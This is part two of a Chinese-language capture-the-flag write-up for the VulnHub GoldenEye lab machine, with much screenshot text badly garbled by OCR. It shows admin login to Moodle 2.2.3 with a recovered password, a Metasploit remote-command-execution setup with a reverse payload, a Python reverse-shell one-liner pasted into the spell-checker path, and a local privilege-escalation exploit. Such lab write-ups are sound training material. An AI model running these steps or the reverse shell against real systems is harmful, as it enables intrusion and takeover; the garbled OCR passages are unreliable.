vulnhub-GoldenEye靶机通关wp(二)

简介: vulnhub-GoldenEye靶机通关wp

20.发现了版本2.2.3的cms。

a0e9c1c35a83546444adc708cc5419f3_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


21.发现了一个敏感文件。

2e8ce5dde37a780f304f28141a169c73_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

22.发现了目录

1b8594669bf167133d5e5b7234880595_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

23访问一下看看。使用wget下载到本地,wget http://severnaya-station.com/dir007key/for-007.jpg

e331b38f27c1164f002db374a04798a9_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

24.使用binwalk(路由逆向分析工具)、exiftool(图虫)、strings(识别动态库版本指令)等查看图片。

b6e9f5f3cb50e52f195dc4d2128504e4_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

25.发现base64加密。

a5b5206f748644cda92c234c9454705e_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

26.解密。xWinter1995x!

43512bff30e89108d3617ada1d463651_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

27.使用admin/xWinter1995x! 登录。

image.png

2.2.3:Administration:Se.

KaliLinuxRevealediMa..

09:28

上午

<s3cret.txt>

2.2.3:Administation:SeverEnvIronmentMozillaFirefox

2.2.3:AdministrationSeX

severnaya-station.com/gnocertdirladmin/enironment.

业你印

Updatecomponent

Environment

Home

Myhome

Sitepages

Checkhowydurserversuiscurentandfuureinstalaionrguirements

Myprotile

2.2.3(Bulld:20120514)

Moodleversidh

Courses

Serverchecks

ED

Adminbookmarks

lnformationReport

bookmmarkthispage

Status

Check

shoudbeinstalledandenabledforbestresults

xmlrpc

Settings

ieamlRcetciomkneeh

Check

ad

Myprofilesettings

shoudbeinstalledandenabledforbestresults

ocAtmMAGLmLLoGBAm

Siteadministration

Notifications

Check

int

phpextension

shouldbeinstalledandenabledforbestresults

Registraton

mextcnionisudiomo

3Advancedfeatures

意启普意意业业电电活活

moodle

version1.9isrequiredandyouarennning2.2.

Users

mustbeinstalledandenabled

Courses

postgres

versilon8.3equiredandyounning322

Grades

version5.3.2isrequiredandyoureunning55.91.4.2

Location

php

Language

php_extension

mustbeinstalledandenabled

Plugins

mbstring

shouldbeinstalledandenabledforbestresults

phpextension

Secunty

cur

musibelnstalledandenabled

Appearance

shouldbeinstalledandenablcdforbestresults

phpextension

Frontpage

tokenizet

php_extension

shouldbeinstalledandenabledforbestresults

Server

shouldbeinstalledandenabledforbestresults

SoaP

phpextension

竖盗洲图

Systempaths

ctype

phpextenslon

supportcontact

mustbeinstalledandenabled

Sessionhandling

phpextension

Zip

mustbeinstallcdandenablcd

HTTP

Slmplexml

mustbeinstalledandenabled

Maintenancemode

mustbeinstalledandenabled

Spl

Cleanup

pcre

mustbeinstalledandenabled

Environment

dom

mustbeinstalledandenabled

PHPinTo

docsmoodeorq/22/en/admin/environetphpextenon/x

m

尿指针移入其中或按Ctrl+G.

28.浏览器搜索历史漏洞。

image.png

oftBing

Moodle2.2.3漏洞

可典

地图

网页

学术

视须

图片

在新选项卡中打开链接

时间不限

3,050,000.000条结果

相关搜索

国家信息安全漏洞库

www.CVdg.cwB/xxKIxqBYIdNDN242

https202.117.15.60moodle

2012920Mo澳大多MDougam)博开发的,开的电子

10.1.15.232moodle

软件平台,也称课程管理系统,学习管理系统北拟学习环算.Mood225之前的22本232之

nwthmoodle

前的23x版季中的eposioylepsoy..远认用可利用该属通过mXbVe

字段中的-1值,绕过预期上传大小的限制..

ualmoodle

gdmoodle

MoodleSpellcheck远程命令执行漏洞

moodlenottingham

htps:/lwww.netentsec.com/supportyshow-loopholeugrade.

moodlephp

20131030.Mood是个课程管理系统(CMS),也被叫做学习管理系统(MS)或拟学习环境

moodletum

VE,Mo223.25上存在远程命全执行漏洞,远程攻击者可利用此湿减在受影应用

上下文中执行任意命令

Moodle文件系统未授权访问漏洞(CVE-2013-4524)

Linux

https://www.linuxidc.com/Linux/2013-11/93249.htm

20131125Mod是个课程管理系统(CMS),也慢学习管理系统(MS)或拟学习环境

MEModL25252.2424623板的文件系统件存在未授仪漏洞,攻

击者可利用比泻洞获取未授没读权限,并取教信息..来源:FAodACNCMassat,链

接:http://secunia.com/advsones/55835..建议..

Moodle远程代码执行漏洞-简书-jianshu.com

https://wwwjianshu.com/p/5fb98fc36012

20174.26受该漏洞影响的版本32到321,3.1至314,30到0.827.0到

2.7.18和其他不受支持的版本,技术细节一,太多代码的患Moodle的系统极为庞大,

包含数千个文件,数百个不同的组件,和约200万行的PHP代码

CVE-2020-1754Moodle安全漏洞-漏洞情报,漏洞详情...

https://www.anguanke.comivulid/1964182

20203.17Mod是免费,开的电子学习件平台,也程理统,学管理统拟学

环境.Moode中存在安全流洞,攻击者可利用漏洞置看其他组用的,,以下品及版本受

到:Moode38本至38.1本,37至314本3至36本,3版本至35.10本及

之前不再支持的版本.

Moodle2.2.3漏洞的视频

bing.comivideos

4:12

0:42

LeamingMoodle3.9

InstallMoodle30in2

Moodle2Coniqurar

automatiiculacionenMoo...

Minutes

已览58次2月16.2016

4.7K次观看

已次览3次1月21,2015

ViMeO,DrNellleDeutsch

ViMeOJoseMandeJuan.

Lynda.com-tromLinkedln

二、渗透

1.使用msf,查找历史漏洞。

image.png

metasploit

octelocalhost/share/wordlists/metasploit]

msfconsole

开开开节

cO:

cacao'caco

accao

,aa

gacqcaaaacaca

ecacoooooocco

QqoqoccoccocD

cccccoooooco

Yco

?

网acocco

CCOCO

ca

caao

cQ

cO

Metasploit!

3C

metasploity6.0.15-dey

2071exploits1123auxitiary352post

592payloads-45encoders.10nops

evasion

etasploittip:Viewadvancedmtithdce

searchmoodle

atchingModules

DisclosureDateRankCheck

Description

Name

RenoteCommandExecution

2013-10-30

0

Moodte

No

exploit/multi/http/moodle.cmd_exec2

good

modlebyhseorthdex.ormlenuoute

nteractwith

sf6>use日

2.设置payload。

image.png

eor

InteractwithamodulebynameorindeXoe

Pexample

msf6>use日

msf6exploit(multi/http/moodecme

admin

setusername

admin

usernamee>a

msf6exploit(multi/http/moodecde

setpasswordxlinter1995x!

exec)

passworde_xwinter1995x!

setrhostssevernaya-station.com

sf6exploit(multi/http/moodecd

exec

rhostse_severnaya-station.com

targeturi/gnocertdir

msf6exploit(multi/http/moodlecdexe)

set

targeturie_/gnocertdir

set

cmd/unixreverse

payload

msf6exploit(multi/http/moodlecdex

payloadeocmd/unixreverse

thost10.10.10.128

set

msf6exploit(multi/http/moodle

cmd

exec

thoste210.10.10.128

msf6exploit(multi/http/mooec

show

options

exec

Module

eoptions(exploit/mutihttp/oodecex)

Currentsetting

Name

Reguired

Description

Passwordtoauthenticatewith

PASSWORD

xWinter1995x!

yes

Aproxychainoffomattype:host:portLtype:host:ot.

Proxies

n0

Thetargethostls),angecdtiferhstithxlath

RHOSTS

ves

severnaya-station.com

Thetargetport(TcP)

RPORT

80

yes

SESSKEY

Thesessionkeyoftheusertoimpersonate

no

false

NegotiateSL/iLsforoutgoingconection

SSL

n0

TARGETURI

TheURIoftheMoodleinstaltation

gnocertdir

yes

Usernametoauthenticatewith

USERNAME

yes

admin

HTTPservervirtualhost

VHOST

n0

Payloadoptions(cmd/unix/reverse):

Required

Name

currentsetting

Description

Thelistenaddress(aninterfacemaybespecified)

10.10.10.128

LHOST

yes

LPORT

4444

Thelistenport

yes

Exploittarget:

Id

Name

Automatic

3.更改编译环境。

image.png

2.2.3:Administration:Plux

severnaya-station.com/gnocertdirladmin/setting.

YouareloggedinasAdmnUsct(Lagou

GoldenEyeOperatorsTraining-Moodle

HoMeSleadminlstaonPlugnxMH

Blocksedluingon

口加

Navigation

Changessaved

Home

TinyMCEHTMLeditor

Myhome

Sitepages

Myprofile

Spellengine

PSpellshell

DetaultGoogleSpell

Courses

cdtortimhhoelopohongmo

Adminbookmarks

Spelljanguagelist

+English-en,Danish-da,Dutch-nl.Finnish-l

Default:

bookmarkthispage

editorunymce

CelFpallanguagest

DDIDdFLFmSe

Settings

Myproflesettings

Savechanges

Siteadministration

轻国

Notifications

Registration

Adivancedfeatures

Users

Courses

Grades

Location

Language

Plugins

Pluginsoverview

Activitymodules

Blocks

Messageoutputs

Authentication

Enrolments

-0.LL店

针移入其中可茶Cur.+G,.

4.使用python脚本提权。

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.10.10.128”,6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

image.png

in2.2.3:Administration:SeX

m

severnaya-station.comlgocertdiadmin/ettingtine

YouarelogdedindsAdminUserLogou

GoldenEyeOperatorsTraining-Moodle

HomeSiteadministrationServer?Systempaths

Blockseditingon

E山

Navigation

Systempaths

Home

Myhome

Sitepages

GDverslon

GD2xisinstalledC

DefaultGDsnotinstalled

gowosion

Myprotle

awwgwatmgcommm

Courses

youredoing-

Adminbookmarks

Pathtodu

bookmarkthispage

DetaultEmply

husr/bin/du

poutoupowemiomm.

ED

Settings

Myproflesettings

Pathtoaspell

shcsleep4062elhet192168

DefaultEmpty

Siteadministration

围Notifications

好可期店店

4F

Registration

bhayonUnwLnkysemy

Advancedfeatures

Users

Courses

Pathtodot

Delault:Emply

pathtodol

Grades

PoinouBotwgomm

Noetia.oos

Language

Plugins

Security

Appearance

Frontpage

Savechanges

Server

角Systempaths

Supportcontact


7e053f2195fd65248862ea09e147047e_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

5.kali使用nc监听6666端口

1183b26a107c75c18f8f6e9b3b16ff7f_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

三、提权

1.下载提权脚本。

2a500adc58d91e73956090fb157cba02_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

2.进入文件目录。

1591ef98fc36da4a9bab5d85b21f38a7_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

3.开启远程文件传输


image.png

44

total

2018

rootroot4096Apr29

3

dnwx-

drwxr-xr-x22rootroot4096Apr242018

lrootroot19May32018

.bashhistory

lrootroot3106Feb192014

bashrc

rootroot4096Apr282018

2r

dnwx-...

cache

flag.txt

rootroot144Apr292018

WW-......

140Feb19

2014

nw-r--r..

1rootroot

romite

2018

rnd

rootroot1024Apr23

1[

rootroot8296Apr29

2018

Viminfo

#catfam

catfaH

cat:f:Nosuchfileordirectory

#catftag.txt

catflag.txt

cat:flag.txt:Nosuchfileordirectory

#ca

ca

sh:9:ca:notfound

#cat'ftaq.rh

catfltag.rh

cat:.ftag.iNosuchfileordirectory

#cat.ttag.txt

catftag.txt

ALeCtoldmetoptacethecodeshere:

568628e0d993b1973adc718237da6e93

Ifyoucapturedthismakesuretogohere.

/006-final/xvf7-ftag

2f1fc5c0b72cad8a93a4a2595ac190a7_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

4.然后在目标机器传输脚本

4c77cae57fe552e88efe17ebdef9d5c6_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

5.将gcc编译改为cc编译。

aab3dad7fb712ecd7204b5e894d772e2_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

6.使用chmod+x权限

使用./exp提权


b6cacdb334ae9950be2391538c4d6fed_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

7.提权成功,然后访问root目录,查看flag。


总结

希望这篇文章可以帮助到你,我也是初学者,希望会的大佬勿喷,如果有错误的地方请指出来,我一定虚心改正。如果有好的方法,大家可以分享出来,多多交流。

相关文章
|
2月前
|
网络协议 Shell 网络安全
【新手向】VulnHub靶场MONEYBOX:1 | 详细解析
这是一篇关于网络安全攻防的详细分析文章,主要讲述了新手如何通过VulnHub靶场中的MoneyBox:1来学习渗透测试的过程。文章首先介绍了环境配置,包括导入虚拟机和网络设置。接着,通过nmap工具扫描目标IP,发现了FTP服务和SSH服务。通过dirsearch工具爆破FTP服务,获取了用户名renu和密码987654321。使用该信息登录FTP,找到了一个提示性的图片,通过steghide工具发现了一个隐藏的数据文件,并通过SSH公钥验证登录
47 0
|
SQL 安全 搜索推荐
靶机实战-vuluhub系列-vulnhub_DOUBLETROUBLE_1
靶机实战-vuluhub系列-vulnhub_DOUBLETROUBLE_1
靶机实战-vuluhub系列-vulnhub_DOUBLETROUBLE_1
|
7月前
|
安全 Shell
vulnhub靶场—matrix-breakout-2-morpheus靶机
vulnhub靶场—matrix-breakout-2-morpheus靶机
100 2
|
数据安全/隐私保护
vulnhub-GoldenEye靶机通关wp(一)
vulnhub-GoldenEye靶机通关wp
231 0
|
安全 Shell Linux
vulnhub靶机系列之zico2
vulnhub靶机系列之zico2
|
Shell Apache 数据库
Vulnhub靶场之Me-and-My-Girlfriend(二)
Vulnhub靶场之Me-and-My-Girlfriend
107 0
Vulnhub靶场之Me-and-My-Girlfriend(二)
|
Web App开发 存储 安全
Vulnhub靶场之Me-and-My-Girlfriend(一)
Vulnhub靶场之Me-and-My-Girlfriend
157 0
Vulnhub靶场之Me-and-My-Girlfriend(一)
|
安全 Oracle 关系型数据库
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox7( EASYENUM)
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox7( EASYENUM)
172 1
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox7( EASYENUM)
|
安全 Oracle 关系型数据库
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox1
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox1
196 1
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox1
|
安全 Oracle 关系型数据库
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox2(ROOKIE)
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox2(ROOKIE)
200 1
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox2(ROOKIE)